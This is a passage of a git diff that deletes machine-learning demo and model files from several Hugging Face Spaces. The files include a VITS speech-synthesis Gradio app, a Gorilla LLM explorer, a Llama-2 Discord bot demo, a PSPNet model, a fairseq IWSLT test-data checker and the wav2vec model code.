text.substr(0, 20)+'.wav'; - oA.href = audio; - document.body.appendChild(oA); - oA.click(); - oA.remove(); -}} -""" - -if __name__ == '__main__': - with gr.Blocks() as app: - gr.Markdown( - "#
    VITS语音在线合成demo\n" - "
    主要有赛马娘,原神中文,原神日语,崩坏3的音色
    " - '' - '' - ) - - with gr.Tabs(): - with gr.TabItem("vits"): - with gr.Row(): - with gr.Column(): - input_text = gr.Textbox(label="Text (100 words limitation)", lines=5, value="今天晚上吃啥好呢。", elem_id=f"input-text") - lang = gr.Dropdown(label="Language", choices=["中文", "日语", "中日混合(中文用[ZH][ZH]包裹起来,日文用[JA][JA]包裹起来)"], - type="index", value="中文") - btn = gr.Button(value="Submit") - with gr.Row(): - search = gr.Textbox(label="Search Speaker", lines=1) - btn2 = gr.Button(value="Search") - sid = gr.Dropdown(label="Speaker", choices=speakers, type="index", value=speakers[228]) - with gr.Row(): - ns = gr.Slider(label="noise_scale(控制感情变化程度)", minimum=0.1, maximum=1.0, step=0.1, value=0.6, interactive=True) - nsw = gr.Slider(label="noise_scale_w(控制音素发音长度)", minimum=0.1, maximum=1.0, step=0.1, value=0.668, interactive=True) - ls = gr.Slider(label="length_scale(控制整体语速)", minimum=0.1, maximum=2.0, step=0.1, value=1.2, interactive=True) - with gr.Column(): - o1 = gr.Textbox(label="Output Message") - o2 = gr.Audio(label="Output Audio", elem_id=f"tts-audio") - o3 = gr.Textbox(label="Extra Info") - download = gr.Button("Download Audio") - btn.click(vits, inputs=[input_text, lang, sid, ns, nsw, ls], outputs=[o1, o2, o3], api_name="generate") - download.click(None, [], [], _js=download_audio_js.format()) - btn2.click(search_speaker, inputs=[search], outputs=[sid]) - lang.change(change_lang, inputs=[lang], outputs=[ns, nsw, ls]) - with gr.TabItem("可用人物一览"): - gr.Radio(label="Speaker", choices=speakers, interactive=False, type="index") - app.queue(concurrency_count=1).launch() \ No newline at end of file diff --git a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pspnet/model.py b/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pspnet/model.py deleted file mode 100644 index 9f9997f82bd77e4e8ac44e7550daa53739f1f828..0000000000000000000000000000000000000000 --- a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pspnet/model.py +++ /dev/null @@ -1,101 +0,0 @@ -from typing import Optional, Union - -from segmentation_models_pytorch.encoders import get_encoder -from segmentation_models_pytorch.base import ( - SegmentationModel, - SegmentationHead, - ClassificationHead, -) -from .decoder import PSPDecoder - - -class PSPNet(SegmentationModel): - """PSPNet_ is a fully convolution neural network for image semantic segmentation. Consist of - *encoder* and *Spatial Pyramid* (decoder). Spatial Pyramid build on top of encoder and does not - use "fine-features" (features of high spatial resolution). PSPNet can be used for multiclass segmentation - of high resolution images, however it is not good for detecting small objects and producing accurate, - pixel-level mask. - - Args: - encoder_name: Name of the classification model that will be used as an encoder (a.k.a backbone) - to extract features of different spatial resolution - encoder_depth: A number of stages used in encoder in range [3, 5]. Each stage generate features - two times smaller in spatial dimensions than previous one (e.g. for depth 0 we will have features - with shapes [(N, C, H, W),], for depth 1 - [(N, C, H, W), (N, C, H // 2, W // 2)] and so on). - Default is 5 - encoder_weights: One of **None** (random initialization), **"imagenet"** (pre-training on ImageNet) and - other pretrained weights (see table with available weights for each encoder_name) - psp_out_channels: A number of filters in Spatial Pyramid - psp_use_batchnorm: If **True**, BatchNorm2d layer between Conv2D and Activation layers - is used. If **"inplace"** InplaceABN will be used, allows to decrease memory consumption. - Available options are **True, False, "inplace"** - psp_dropout: Spatial dropout rate in [0, 1) used in Spatial Pyramid - in_channels: A number of input channels for the model, default is 3 (RGB images) - classes: A number of classes for output mask (or you can think as a number of channels of output mask) - activation: An activation function to apply after the final convolution layer. - Available options are **"sigmoid"**, **"softmax"**, **"logsoftmax"**, **"tanh"**, **"identity"**, - **callable** and **None**. - Default is **None** - upsampling: Final upsampling factor. Default is 8 to preserve input-output spatial shape identity - aux_params: Dictionary with parameters of the auxiliary output (classification head). Auxiliary output is build - on top of encoder if **aux_params** is not **None** (default). Supported params: - - classes (int): A number of classes - - pooling (str): One of "max", "avg". Default is "avg" - - dropout (float): Dropout factor in [0, 1) - - activation (str): An activation function to apply "sigmoid"/"softmax" - (could be **None** to return logits) - - Returns: - ``torch.nn.Module``: **PSPNet** - - .. _PSPNet: - https://arxiv.org/abs/1612.01105 - """ - - def __init__( - self, - encoder_name: str = "resnet34", - encoder_weights: Optional[str] = "imagenet", - encoder_depth: int = 3, - psp_out_channels: int = 512, - psp_use_batchnorm: bool = True, - psp_dropout: float = 0.2, - in_channels: int = 3, - classes: int = 1, - activation: Optional[Union[str, callable]] = None, - upsampling: int = 8, - aux_params: Optional[dict] = None, - ): - super().__init__() - - self.encoder = get_encoder( - encoder_name, - in_channels=in_channels, - depth=encoder_depth, - weights=encoder_weights, - ) - - self.decoder = PSPDecoder( - encoder_channels=self.encoder.out_channels, - use_batchnorm=psp_use_batchnorm, - out_channels=psp_out_channels, - dropout=psp_dropout, - ) - - self.segmentation_head = SegmentationHead( - in_channels=psp_out_channels, - out_channels=classes, - kernel_size=3, - activation=activation, - upsampling=upsampling, - ) - - if aux_params: - self.classification_head = ClassificationHead( - in_channels=self.encoder.out_channels[-1], **aux_params - ) - else: - self.classification_head = None - - self.name = "psp-{}".format(encoder_name) - self.initialize() diff --git a/spaces/gorilla-llm/gorilla-demo/app.py b/spaces/gorilla-llm/gorilla-demo/app.py deleted file mode 100644 index 235d9549807980ed24d63253676faf9af42e849c..0000000000000000000000000000000000000000 --- a/spaces/gorilla-llm/gorilla-demo/app.py +++ /dev/null @@ -1,112 +0,0 @@ -# Copyright 2023 https://github.com/ShishirPatil/gorilla -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - -import gradio as gr -import openai -import re - -# There is no need for an API key let the following be as is -openai.api_key = "EMPTY" - -# Set up the API base -openai.api_base = "http://zanino.millennium.berkeley.edu:8000/v1" -# If there is any issue try using -# openai.api_base = "http://34.132.127.197:8000/v1" - -# Define function to get Gorilla response -def get_gorilla_response(prompt, model="gorilla-7b-hf-v1"): - completion = openai.ChatCompletion.create( - model=model, - messages=[{"role": "user", "content": prompt}] - ) - return completion.choices[0].message.content - -# Define function to parse output -def parse_output(text, model): - if model == "gorilla-7b-hf-v1": - components = {} - components['domain'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['api_call'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['api_provider'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['explanation'] = text.split("<<>>:")[1].split("<<>>")[0].strip() - components['code'] = text.split("<<>>:")[1].strip() - return components - elif model == "gorilla-mpt-7b-hf-v0": - keys_to_remove = ['api_call', 'api_provider', 'explanation', 'code'] - x = text.split(":") - x.pop(0) - for i in range(len(x)): - for key in keys_to_remove: - x[i] = x[i].replace(f'{key}','').replace(f", '{key}'", '').replace(f", '{key}':", '').replace(f"'{key}':", '').replace('''\\"''','''"''').replace('''"\\''','''"''').replace("""\'""","""'""").replace("""'\\""","""'""") - components = { - 'domain': x[0].strip("' ").replace("\n<<<","").replace('"','').replace('<','').replace('>',''), - 'api_call': x[1].strip("' ").replace("\n<<<","").replace('<','').replace('>',''), - 'api_provider': x[2].strip("' ").replace("\n<<","").replace('<','').replace('>',''), - 'explanation': x[3].strip("' ").replace(r'\n', '\n').replace('<','').replace('>',''), - 'code': x[4].strip("' ").replace(r'\n', '\n').replace('<','').replace('>','') - } - return components - elif model == "gorilla-7b-th-v0": - x = text.split(":") - keys_to_remove = ['api_call', 'api_provider', 'explanation', 'code'] - x.pop(0) - for i in range(len(x)): - for key in keys_to_remove: - x[i] = x[i].replace(f", '{key}'", '').replace(f", '{key}':", '').replace(f"'{key}':", '').replace('''\\"''','''"''').replace('''"\\''','''"''').replace("""\'""","""'""").replace("""'\\""","""'""") - components = { - 'domain': x[0].strip("' "), - 'api_call': x[1].strip("' "), - 'api_provider': x[2].strip("' "), - 'explanation': x[3].strip("' ").replace(r'\n', '\n'), - 'code': x[4].strip("' ").replace(r'\n', '\n') - } - return components - -# Define the function for the interface -def parse_and_display(prompt, model): - text = get_gorilla_response(prompt, model) - components = parse_output(text, model) - domain = components['domain'] - api_call = components['api_call'] - api_provider = components['api_provider'] - explanation = components['explanation'] - code = components['code'] - return domain, api_call, api_provider, explanation, code - -# Define example prompts -examples = [ - ["I would like to translate 'I feel very good today.' from English to French.","gorilla-7b-hf-v1"], - ["I want to build a robot that can detecting objects in an image ‘cat.jpeg’. Input: [‘cat.jpeg’]","gorilla-7b-hf-v1"], - ["I would like to translate from English to Chinese.","gorilla-7b-th-v0"], -] - -# Create the Gradio interface -iface = gr.Interface( - fn=parse_and_display, - inputs=["text", gr.components.Dropdown(["gorilla-7b-hf-v1", "gorilla-7b-th-v0", "gorilla-7b-tf-v0", "gorilla-mpt-7b-hf-v0"], label="Model")], - outputs=[ - gr.components.Textbox(label="Domain"), - gr.components.Textbox(label="API Call"), - gr.components.Textbox(label="API Provider"), - gr.components.Textbox(label="Explanation"), - gr.components.Code(label="Code") - ], - title="Gorilla Gradio Explorer", - description="Gorilla is an LLM that can pick the right API for your tasks. Check out the examples below. Learn more at gorilla.cs.berkeley.edu", - examples=examples, -) - -# Launch the interface and get the public gradio link -iface.launch() \ No newline at end of file diff --git a/spaces/gradio-discord-bots/llama-2-13b-chat-transformers/app.py b/spaces/gradio-discord-bots/llama-2-13b-chat-transformers/app.py deleted file mode 100644 index 65efc91ec03372d91dcc56a4c839c5b36058aca9..0000000000000000000000000000000000000000 --- a/spaces/gradio-discord-bots/llama-2-13b-chat-transformers/app.py +++ /dev/null @@ -1,80 +0,0 @@ -import gradio as gr -import torch -import os - -from model import get_input_token_length, run - -DEFAULT_SYSTEM_PROMPT = """\ -You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature.\n\nIf a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information.\ -""" -MAX_MAX_NEW_TOKENS = 2048 -DEFAULT_MAX_NEW_TOKENS = 1024 -MAX_INPUT_TOKEN_LENGTH = 4000 - - -LICENSE = """ -

    - ---- -As a derivate work of [Llama-2-13b-chat](https://huggingface.co/meta-llama/Llama-2-13b-chat) by Meta, -this demo is governed by the original [license](https://huggingface.co/spaces/huggingface-projects/llama-2-13b-chat/blob/main/LICENSE.txt) and [acceptable use policy](https://huggingface.co/spaces/huggingface-projects/llama-2-13b-chat/blob/main/USE_POLICY.md). -""" - -is_spaces = True if "SPACE_ID" in os.environ else False -if is_spaces : - is_shared_ui = True if "gradio-discord-bots/llama-2-13b-chat-transformers" in os.environ['SPACE_ID'] else False -else: - is_shared_ui = False -is_gpu_associated = torch.cuda.is_available() - - -def generate( - message: str, - history: list[tuple[str, str]], - system_prompt=DEFAULT_SYSTEM_PROMPT, - max_new_tokens=DEFAULT_MAX_NEW_TOKENS, - temperature=1.0, - top_p=0.95, - top_k=50, -) -> tuple[str, list[tuple[str, str]]]: - if is_shared_ui: - raise ValueError("Cannot use demo running in shared_ui. Must duplicate your own space.") - if max_new_tokens > MAX_MAX_NEW_TOKENS: - raise ValueError - - input_token_length = get_input_token_length(message, history, system_prompt) - if input_token_length > MAX_INPUT_TOKEN_LENGTH: - response = f'The accumulated input is too long ({input_token_length} > {MAX_INPUT_TOKEN_LENGTH}). Please create a new thread.' - else: - response = run(message, history, system_prompt, max_new_tokens, temperature, top_p, top_k) - return response - -interface = gr.ChatInterface(generate) - -with gr.Blocks() as demo: - - gr.Markdown( - """ - # Llama-2-13b-chat-hf Discord Bot Powered by Gradio and Hugging Face Transformers - - ### First install the `gradio_client` - - ```bash - pip install gradio_client - ``` - - ### Then deploy to discord in one line! ⚡️ - - ```python - secrets = {"HUGGING_FACE_HUB_TOKEN": "",} - client = grc.Client.duplicate("gradio-discord-bots/llama-2-13b-chat-transformers", secrets=secrets, hardware="a10g-small", sleep_timeout=2880) - client.deploy_discord(api_names=["chat"], hf_token="") - ``` - """ - ) - - gr.Markdown(LICENSE) - with gr.Row(visible=False): - interface.render() - -demo.queue(max_size=20).launch() diff --git a/spaces/gradio/HuBERT/examples/multilingual/data_scripts/check_iswlt_test_data.py b/spaces/gradio/HuBERT/examples/multilingual/data_scripts/check_iswlt_test_data.py deleted file mode 100644 index f8e2eb0f15699f1b458a8445d0c1dd6229a21f77..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/examples/multilingual/data_scripts/check_iswlt_test_data.py +++ /dev/null @@ -1,67 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import os, sys -import subprocess -import re -from subprocess import check_call, check_output - -WORKDIR_ROOT = os.environ.get('WORKDIR_ROOT', None) - -if WORKDIR_ROOT is None or not WORKDIR_ROOT.strip(): - print('please specify your working directory root in OS environment variable WORKDIR_ROOT. Exitting..."') - sys.exit(-1) - - -BLEU_REGEX = re.compile("^BLEU\\S* = (\\S+) ") -def run_eval_bleu(cmd): - output = check_output(cmd, shell=True, stderr=subprocess.STDOUT).decode("utf-8").strip() - print(output) - bleu = -1.0 - for line in output.strip().split('\n'): - m = BLEU_REGEX.search(line) - if m is not None: - bleu = m.groups()[0] - bleu = float(bleu) - break - return bleu - -def check_data_test_bleu(raw_folder, data_lang_pairs): - not_matchings = [] - for sacrebleu_set, src_tgts in data_lang_pairs: - for src_tgt in src_tgts: - print(f'checking test bleus for: {src_tgt} at {sacrebleu_set}') - src, tgt = src_tgt.split('-') - ssrc, stgt = src[:2], tgt[:2] - if os.path.exists(f'{raw_folder}/test.{tgt}-{src}.{src}'): - # reversed direction may have different test set - test_src = f'{raw_folder}/test.{tgt}-{src}.{src}' - else: - test_src = f'{raw_folder}/test.{src}-{tgt}.{src}' - cmd1 = f'cat {test_src} | sacrebleu -t "{sacrebleu_set}" -l {stgt}-{ssrc}; [ $? -eq 0 ] || echo ""' - test_tgt = f'{raw_folder}/test.{src}-{tgt}.{tgt}' - cmd2 = f'cat {test_tgt} | sacrebleu -t "{sacrebleu_set}" -l {ssrc}-{stgt}; [ $? -eq 0 ] || echo ""' - bleu1 = run_eval_bleu(cmd1) - if bleu1 != 100.0: - not_matchings.append(f'{sacrebleu_set}:{src_tgt} source side not matching: {test_src}') - bleu2 = run_eval_bleu(cmd2) - if bleu2 != 100.0: - not_matchings.append(f'{sacrebleu_set}:{src_tgt} target side not matching: {test_tgt}') - return not_matchings - -if __name__ == "__main__": - to_data_path = f'{WORKDIR_ROOT}/iwsltv2' - not_matching = check_data_test_bleu( - f'{to_data_path}/raw', - [ - ('iwslt17', ['en_XX-ar_AR', 'en_XX-ko_KR', 'ar_AR-en_XX', 'ko_KR-en_XX']), - ('iwslt17', ['en_XX-it_IT', 'en_XX-nl_XX', 'it_IT-en_XX', 'nl_XX-en_XX']), - ('iwslt17/tst2015', ['en_XX-vi_VN', "vi_VN-en_XX"]), - ] - ) - if len(not_matching) > 0: - print('the following datasets do not have matching test datasets:\n\t', '\n\t'.join(not_matching)) - diff --git a/spaces/gradio/HuBERT/fairseq/models/wav2vec/wav2vec.py b/spaces/gradio/HuBERT/fairseq/models/wav2vec/wav2vec.py deleted file mode 100644 index af6604da10f504baabff50bf14a6eb2214bffef3..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/models/wav2vec/wav2vec.py +++ /dev/null @@ -1,630 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from dataclasses import dataclass, field -import logging -import math -from typing import Optional, Tuple -from omegaconf import II -import sys - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.models import BaseFairseqModel, register_model -from fairseq.modules import ( - Fp32GroupNorm, - Fp32LayerNorm, - GumbelVectorQuantizer, - KmeansVectorQuantizer, - TransposeLast, -) -from fairseq.tasks import FairseqTask -from fairseq.utils import buffered_arange - - -logger = logging.getLogger(__name__) - - -AGGREGATOR_CHOICES = ChoiceEnum(["cnn", "gru"]) -PROJECT_FEATURES_CHOICES = ChoiceEnum(["none", "same", "new"]) -ACTIVATION_CHOICES = ChoiceEnum(["relu", "gelu"]) -VQ_TYPE_CHOICES = ChoiceEnum(["none", "gumbel", "kmeans"]) - - -@dataclass -class Wav2VecConfig(FairseqDataclass): - prediction_steps: int = field( - default=12, metadata={"help": "number of steps ahead to predict"} - ) - sample_distance: Optional[int] = field( - default=None, - metadata={ - "help": "sample distance from target. does not work properly with cross-sampling" - }, - ) - cross_sample_negatives: int = field( - default=0, metadata={"help": "num of cross sampled negatives"} - ) - num_negatives: int = field( - default=10, metadata={"help": "num of sampled negatives"} - ) - conv_feature_layers: str = field( - default="[(512, 10, 5), (512, 8, 4), (512, 4, 2), (512, 4, 2), (512, 4, 2), (512, 1, 1), (512, 1, 1), (512, 1, 1)]", - metadata={ - "help": "convolutional feature extraction layers [(dim, kernel_size, stride), ...]" - }, - ) - conv_aggregator_layers: str = field( - default="[(512, 2, 1), (512, 3, 1), (512, 4, 1), (512, 5, 1), (512, 6, 1), (512, 7, 1), (512, 8, 1), (512, 9, 1), (512, 10, 1), (512, 11, 1), (512, 12, 1), (512, 13, 1)]", - metadata={ - "help": "convolutional aggregator layers [(dim, kernel_size, stride), ...]" - }, - ) - dropout: float = field( - default=0.0, metadata={"help": "dropout to apply within the model"} - ) - dropout_features: float = field( - default=0.0, metadata={"help": "dropout to apply to the features"} - ) - dropout_agg: float = field( - default=0.0, metadata={"help": "dropout to apply after aggregation step"} - ) - aggregator: AGGREGATOR_CHOICES = field( - default="cnn", metadata={"help": "type of aggregator to use"} - ) - gru_dim: int = field(default=512, metadata={"help": "GRU dimensionality"}) - no_conv_bias: bool = field( - default=False, metadata={"help": "if set, does not learn bias for conv layers"} - ) - agg_zero_pad: bool = field( - default=False, - metadata={"help": "if set, zero pads in aggregator instead of repl pad"}, - ) - skip_connections_feat: bool = field( - default=False, - metadata={"help": "if set, adds skip connections to the feature extractor"}, - ) - skip_connections_agg: bool = field( - default=True, - metadata={"help": "if set, adds skip connections to the aggregator"}, - ) - residual_scale: float = field( - default=0.5, metadata={"help": "scales residual by sqrt(value)"} - ) - log_compression: bool = field( - default=True, - metadata={"help": "if set, adds a log compression to feature extractor"}, - ) - balanced_classes: bool = field( - default=False, - metadata={"help": "if set, loss is scaled to balance for number of negatives"}, - ) - project_features: PROJECT_FEATURES_CHOICES = field( - default="none", - metadata={ - "help": "if not none, features are projected using the (same or new) aggregator" - }, - ) - non_affine_group_norm: bool = field( - default=False, metadata={"help": "if set, group norm is not affine"} - ) - offset: str = field( - default="auto", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - activation: ACTIVATION_CHOICES = field( - default="relu", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - vq_type: VQ_TYPE_CHOICES = field( - default="none", metadata={"help": "which type of quantizer to use"} - ) - vq_vars: int = field( - default=320, - metadata={"help": "project to this many vector quantized variables per group"}, - ) - vq_groups: int = field( - default=2, metadata={"help": "number of groups of latent variables"} - ) - vq_dim: int = field( - default=0, - metadata={ - "help": "uses this dimensionality for quantized vectors. 0 to use model dim // groups" - }, - ) - vq_depth: int = field( - default=1, metadata={"help": "number of layers for vq weight projection"} - ) - combine_groups: bool = field( - default=False, metadata={"help": "if set, variables are shared among groups"} - ) - vq_temp: Tuple[float, float, float] = field( - default=(2.0, 0.5, 0.999995), - metadata={ - "help": "temperature for latent variable sampling with gumbel softmax. should be a tuple of 3 values (start, end, decay)" - }, - ) - vq_gamma: float = field( - default=0.25, - metadata={"help": "gamma parameter for kmeans style vector quantization"}, - ) - infonce: bool = II("criterion.infonce") - - -@register_model("wav2vec", dataclass=Wav2VecConfig) -class Wav2VecModel(BaseFairseqModel): - @classmethod - def build_model(cls, cfg: Wav2VecConfig, task: FairseqTask): - """Build a new model instance.""" - - model = Wav2VecModel(cfg) - logger.info(model) - return model - - def __init__(self, cfg: Wav2VecConfig): - super().__init__() - - self.prediction_steps = cfg.prediction_steps - offset = cfg.offset - - if cfg.activation == "relu": - activation = nn.ReLU() - elif cfg.activation == "gelu": - activation = nn.GELU() - else: - raise Exception("unknown activation " + cfg.activation) - - feature_enc_layers = eval(cfg.conv_feature_layers) - self.feature_extractor = ConvFeatureExtractionModel( - conv_layers=feature_enc_layers, - dropout=0.0, - log_compression=cfg.log_compression, - skip_connections=cfg.skip_connections_feat, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - activation=activation, - ) - embed = feature_enc_layers[-1][0] - - self.vector_quantizer = None - if cfg.vq_type == "gumbel": - self.vector_quantizer = GumbelVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - temp=cfg.vq_temp, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - activation=activation, - weight_proj_depth=cfg.vq_depth, - weight_proj_factor=2, - ) - elif cfg.vq_type == "kmeans": - self.vector_quantizer = KmeansVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - gamma=cfg.vq_gamma, - ) - else: - assert ( - cfg.vq_type == "none" or cfg.vq_type is None - ), "Unknown quantizer type" - - if cfg.offset == "auto": - jin = 0 - rin = 0 - for _, k, stride in feature_enc_layers: - if rin == 0: - rin = k - rin = rin + (k - 1) * jin - if jin == 0: - jin = stride - else: - jin *= stride - offset = math.ceil(rin / jin) - - offset = int(offset) - - def make_aggregator(): - if cfg.aggregator == "cnn": - agg_layers = eval(cfg.conv_aggregator_layers) - agg_dim = agg_layers[-1][0] - feature_aggregator = ConvAggegator( - conv_layers=agg_layers, - embed=embed, - dropout=cfg.dropout, - skip_connections=cfg.skip_connections_agg, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - conv_bias=not cfg.no_conv_bias, - zero_pad=cfg.agg_zero_pad, - activation=activation, - ) - elif cfg.aggregator == "gru": - agg_dim = cfg.gru_dim - feature_aggregator = nn.Sequential( - TransposeLast(), - nn.GRU( - input_size=embed, - hidden_size=agg_dim, - num_layers=1, - dropout=cfg.dropout, - ), - TransposeLast(deconstruct_idx=0), - ) - else: - raise Exception("unknown aggregator type " + cfg.aggregator) - - return feature_aggregator, agg_dim - - self.feature_aggregator, agg_dim = make_aggregator() - - self.wav2vec_predictions = Wav2VecPredictionsModel( - in_dim=agg_dim, - out_dim=embed, - prediction_steps=cfg.prediction_steps, - n_negatives=cfg.num_negatives, - cross_sample_negatives=cfg.cross_sample_negatives, - sample_distance=cfg.sample_distance, - dropout=cfg.dropout, - offset=offset, - balanced_classes=cfg.balanced_classes, - infonce=cfg.infonce, - ) - - self.dropout_feats = nn.Dropout(p=cfg.dropout_features) - self.dropout_agg = nn.Dropout(p=cfg.dropout_agg) - - if cfg.project_features == "none": - self.project_features = None - elif cfg.project_features == "same": - self.project_features = self.feature_aggregator - elif cfg.project_features == "new": - self.project_features, _ = make_aggregator() - - def forward(self, source): - result = {} - - features = self.feature_extractor(source) - if self.vector_quantizer: - q_res = self.vector_quantizer(features) - features = q_res["x"] - for k in q_res.keys(): - if k != "x": - result[k] = q_res[k] - - x = self.dropout_feats(features) - x = self.feature_aggregator(x) - x = self.dropout_agg(x) - - if self.project_features is not None: - features = self.project_features(features) - x, targets = self.wav2vec_predictions(x, features) - result["cpc_logits"] = x - result["cpc_targets"] = targets - - return result - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - - def max_positions(self): - """Maximum length supported by the model.""" - return sys.maxsize - - def get_logits(self, net_output): - logits = net_output["cpc_logits"] - return logits - - def get_targets(self, sample, net_output): - t = net_output["cpc_targets"] - if isinstance(t, tuple): - t = t[0] - return t.contiguous() - - def get_target_weights(self, targets, net_output): - targets = net_output["cpc_targets"] - if isinstance(targets, tuple) and targets[-1] is not None: - return targets[-1] - return None - - def get_extra_losses(self, net_output): - loss = None - if "prob_perplexity" in net_output: - loss = net_output["num_vars"] - net_output["prob_perplexity"] - elif "kmeans_loss" in net_output: - loss = net_output["kmeans_loss"] - - return loss - - -def norm_block(is_layer_norm, dim, affine=True): - if is_layer_norm: - mod = nn.Sequential( - TransposeLast(), - Fp32LayerNorm(dim, elementwise_affine=affine), - TransposeLast(), - ) - else: - mod = Fp32GroupNorm(1, dim, affine=affine) - - return mod - - -class ConvFeatureExtractionModel(nn.Module): - def __init__( - self, - conv_layers, - dropout, - log_compression, - skip_connections, - residual_scale, - non_affine_group_norm, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - return nn.Sequential( - nn.Conv1d(n_in, n_out, k, stride=stride, bias=False), - nn.Dropout(p=dropout), - norm_block( - is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm - ), - activation, - ) - - in_d = 1 - self.conv_layers = nn.ModuleList() - for dim, k, stride in conv_layers: - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - - self.log_compression = log_compression - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - # BxT -> BxCxT - x = x.unsqueeze(1) - - for conv in self.conv_layers: - residual = x - x = conv(x) - if self.skip_connections and x.size(1) == residual.size(1): - tsz = x.size(2) - r_tsz = residual.size(2) - residual = residual[..., :: r_tsz // tsz][..., :tsz] - x = (x + residual) * self.residual_scale - - if self.log_compression: - x = x.abs() - x = x + 1 - x = x.log() - - return x - - -class ZeroPad1d(nn.Module): - def __init__(self, pad_left, pad_right): - super().__init__() - self.pad_left = pad_left - self.pad_right = pad_right - - def forward(self, x): - return F.pad(x, (self.pad_left, self.pad_right)) - - -class ConvAggegator(nn.Module): - def __init__( - self, - conv_layers, - embed, - dropout, - skip_connections, - residual_scale, - non_affine_group_norm, - conv_bias, - zero_pad, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - # padding dims only really make sense for stride = 1 - ka = k // 2 - kb = ka - 1 if k % 2 == 0 else ka - - pad = ( - ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0)) - ) - - return nn.Sequential( - pad, - nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias), - nn.Dropout(p=dropout), - norm_block(False, n_out, affine=not non_affine_group_norm), - activation, - ) - - in_d = embed - self.conv_layers = nn.ModuleList() - self.residual_proj = nn.ModuleList() - for dim, k, stride in conv_layers: - if in_d != dim and skip_connections: - self.residual_proj.append(nn.Conv1d(in_d, dim, 1, bias=False)) - else: - self.residual_proj.append(None) - - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - self.conv_layers = nn.Sequential(*self.conv_layers) - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - for rproj, conv in zip(self.residual_proj, self.conv_layers): - residual = x - x = conv(x) - if self.skip_connections: - if rproj is not None: - residual = rproj(residual) - x = (x + residual) * self.residual_scale - return x - - -class Wav2VecPredictionsModel(nn.Module): - def __init__( - self, - in_dim, - out_dim, - prediction_steps, - n_negatives, - cross_sample_negatives, - sample_distance, - dropout, - offset, - balanced_classes, - infonce, - ): - super().__init__() - - self.n_negatives = n_negatives - self.cross_sample_negatives = cross_sample_negatives - self.sample_distance = sample_distance - self.project_to_steps = nn.ConvTranspose2d( - in_dim, out_dim, (1, prediction_steps) - ) - self.dropout = nn.Dropout(p=dropout) - self.offset = offset - self.balanced_classes = balanced_classes - self.infonce = infonce - - def sample_negatives(self, y): - bsz, fsz, tsz = y.shape - - y = y.transpose(0, 1) # BCT -> CBT - y = y.contiguous().view(fsz, -1) # CBT => C(BxT) - - cross_high = tsz * bsz - high = tsz if self.sample_distance is None else min(tsz, self.sample_distance) - assert high > 1 - - neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz)) - - with torch.no_grad(): - if self.n_negatives > 0: - tszs = ( - buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.n_negatives) - .flatten() - ) - - neg_idxs = torch.randint( - low=0, high=high - 1, size=(bsz, self.n_negatives * tsz) - ) - neg_idxs[neg_idxs >= tszs] += 1 - - if self.cross_sample_negatives > 0: - tszs = ( - buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.cross_sample_negatives) - .flatten() - ) - - cross_neg_idxs = torch.randint( - low=0, - high=cross_high - 1, - size=(bsz, self.cross_sample_negatives * tsz), - ) - cross_neg_idxs[cross_neg_idxs >= tszs] += 1 - - if self.n_negatives > 0: - for i in range(1, bsz): - neg_idxs[i] += i * high - else: - neg_idxs = cross_neg_idxs - - if self.cross_sample_negatives > 0 and self.n_negatives > 0: - neg_idxs = torch.cat([neg_idxs, cross_neg_idxs], dim=1) - - negs = y[..., neg_idxs.view(-1)] - negs = negs.view( - fsz, bsz, self.n_negatives + self.cross_sample_negatives, tsz - ).permute( - 2, 1, 0, 3 - ) # to NxBxCxT - - return negs - - def forward(self, x, y): - - x = x.unsqueeze(-1) - 